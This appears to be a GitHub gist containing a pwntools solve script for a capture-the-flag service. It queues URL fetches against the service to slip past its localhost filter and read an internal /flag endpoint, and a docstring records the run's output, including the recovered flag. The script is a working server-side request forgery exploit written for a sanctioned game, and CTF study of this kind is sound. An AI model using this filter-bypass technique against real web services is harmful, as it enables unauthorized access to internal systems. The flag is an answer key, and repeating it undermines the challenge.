| from pwn import * | |
| r = remote("rms-fixed.hackable.software",1337) | |
| def add_url(url): | |
| r.recvuntil('Choice') | |
| r.sendline("a") | |
| r.recvuntil("url?") | |
| r.sendline(url) | |
| def view_request(idx): | |
| r.recvuntil('Choice') | |
| r.sendline("v") | |
| r.recvuntil("request id?") | |
| r.sendline(str(idx)) | |
| data = r.recvuntil("What do?") | |
| return data | |
| raw_input("?") | |
| target = "http://google.com:8000/flag" | |
| for i in range(5): | |
| add_url(target) | |
| for i in range(2): | |
| add_url("http://127.0.0.1:8000/flag") | |
| r.interactive() | |
| """ | |
| Choice? [pfvaq] $ f Done: [5] FAIL: localhost not allowed | |
| [6] FAIL: localhost not allowed | |
| [0] OK, HTTP/1.0 200 OK | |
| [1] OK, HTTP/1.0 200 OK | |
| [2] OK, HTTP/1.0 200 OK | |
| [3] OK, HTTP/1.0 200 OK | |
| [4] OK, HTTP/1.0 200 OK | |
| What do? | |
| list [p]ending requests | |
| list [f]inished requests | |
| [v]iew result of request | |
| [a]dd new request | |
| [q]uit | |
| Choice? [pfvaq] $ v request id? $ 0 [0] Response, 121 bytes: HTTP/1.0 200 OK Server: BaseHTTP/0.3 Python/2.7.15+ | |
| Date: Sun, 22 Sep 2019 13:57:04 GMT | |
| DrgnS{e9759caf4f2d2b69773c} | |
| What do? | |
| list [p]ending requests | |
| list [f]inished requests | |
| [v]iew result of request | |
| [a]dd new request | |
| [q]uit | |
| Choice? [pfvaq] $ | |
| """ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment